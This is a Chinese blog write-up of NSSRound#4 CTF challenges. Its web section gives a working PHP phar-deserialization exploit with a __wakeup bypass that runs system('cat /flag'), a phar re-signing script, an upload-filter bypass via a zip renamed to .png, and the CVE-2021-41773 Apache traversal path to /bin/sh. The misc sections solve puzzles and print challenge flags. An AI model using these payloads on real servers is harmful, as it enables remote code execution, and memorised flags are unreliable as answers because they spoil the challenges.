[NSSRound#4] 复现

阅读约 5 分钟

Web

1zweb

直接能非预期读出来flag

1zweb(revenge)

就是上题的预期解

文件上传、反序列化、PHP伪协议

index.php

<?php
class LoveNss{
    public $ljt;
    public $dky;
    public $cmd;
    public function __construct(){
        $this->ljt="ljt";
        $this->dky="dky";
        phpinfo();
    }
    public function __destruct(){
        if($this->ljt==="Misc"&&$this->dky==="Re")
            eval($this->cmd);
    }
    public function __wakeup(){
        $this->ljt="Re";
        $this->dky="Misc";
    }
}
$file=$_POST['file'];
if(isset($_POST['file'])){
    echo file_get_contents($file);
}

file_get_content可以触发phar反序列化,只需绕过__wakeup即可

<?php
class LoveNss{
    public $ljt="Misc";
    public $dky="Re";
    public $cmd="system('cat /flag');";
}

$a = new LoveNss();
echo serialize($a);

# 下面这部分就没改
$phar = new Phar("phar.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub

$phar->setMetadata($a); //将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();

由于需要绕过wakeup,因为是后面自己去改的数据,而phar文件的签名是第一次生成文件的时候自动生成的,所以当我们修改数据过后,由于签名错误,这个phar是无法被正常解析的,所以需要修改签名,让他变成一个正常的phar文件还需要对phar文件进行修改

from hashlib import sha1

file = open('poc.phar', 'rb').read() # 需要重新生成签名的phar文件

data = file[:-28] # 获取需要签名的数据

final = file[-8:] # 获取最后8位GBMB标识和签名类型

newfile = data+sha1(data).digest()+final # 数据 + 签名 + 类型 + GBMB

open('newpoc.phar', 'wb').write(newfile) # 写入到新的phar文件

upload.php

<?php
if ($_FILES["file"]["error"] > 0){
    echo "上传异常";
}
else{
    $allowedExts = array("gif", "jpeg", "jpg", "png");
    $temp = explode(".", $_FILES["file"]["name"]);
    $extension = end($temp);
    if (($_FILES["file"]["size"] && in_array($extension, $allowedExts))){
        $content=file_get_contents($_FILES["file"]["tmp_name"]);
        $pos = strpos($content, "__HALT_COMPILER();");
        if(gettype($pos)==="integer"){
            echo "ltj一眼就发现了phar";
        }else{
            if (file_exists("./upload/" . $_FILES["file"]["name"])){
                echo $_FILES["file"]["name"] . " 文件已经存在";
            }else{
                $myfile = fopen("./upload/".$_FILES["file"]["name"], "w");
                fwrite($myfile, $content);
                fclose($myfile);
                echo "上传成功 ./upload/".$_FILES["file"]["name"];
            }
        }
    }else{
        echo "dky不喜欢这个文件 .".$extension;
    }
}

这里对文件后后缀进行了白名单,也对phar文件内容进行了检测,伪了绕过这两点

将文件压缩为zip文件,并把后缀改为png文件,这样文件内容和后缀白名单检测都绕过了

我们可以使用phar伪协议

file=phar://./upload/123.png/newpoc.phar

ez_rce

CVE-2021-41773

Apache2.4.49 有目录穿越漏洞

如果服务端开启了cgi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执行任意命令

/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh

这里制造了一个文件夹迷宫,四层(靠经验和尝试了)

集束炸弹爆破出路径 四个变量都0~9

MISC

Signin

给了一个dockerfile

导入了一个hggg/flag:v0镜像,然后将镜像中FLAG环境变量的数据写入了flag.txt文件之中。

通过DockerHub查看镜像的细节:

在操作历史中,就可以看到对FLAG这个环境变量的操作历史

提取像素点数据 31*31

from PIL import Image
result = open('1.txt','w+')
img = Image.open("Pixel_Signin.png")
img = img.convert('RGB')
for i in range(31):
    for j in range(31):
        r,g,b = img.getpixel((j,i))
        print(r,g,b,file=result)

得到的数据都是在ASCII可见字符范围内 ,拿取转ASCII

这串数据 凯撒或rot13

NSSCTF{Haruki_is_NSS_SUPERMAN_so_this_task_is_easy}

Knight's Tour!

zip打不开,是把zip文件头换成rar了,换回去

下面组成的话和题目都指向 Knight‘s Tour ,一个棋类游戏

可以看到下面的句子跟原棋盘数量一样,也就是我们要给原棋盘涂色,玩完之后能组成下面的句子并且颜色相符。

涂完之后 红黄转01二进制 ,然后ASCII

Type Message

手机键盘

听一下音频,就是手机拨号码的声音

四个字母有信息DTMF 解密手机键盘拨号

Detect DTMF Tones

627474238133 3118161334374 7333221535393 322217493

NSSCTF DTMFIS REALLY EASY =》 NSSCTF{DTMFISREALLYEASY}


 赏 
感谢您的支持,我会继续努力哒!
~~  The   End  ~~

文章二维码 本文标签:web, misc
最后编辑:2022 年 08 月 12 日 23:23 By ThnPkm
本文链接:http://thnpkm.xyz/index.php/archives/74/(转载时请注明出处及链接! )
作品采用: 署名-非商业性使用-相同方式共享 4.0 国际 (CC BY-NC-SA 4.0) 许可协议授权。
1 + 4 =
快来做第一个评论的人吧~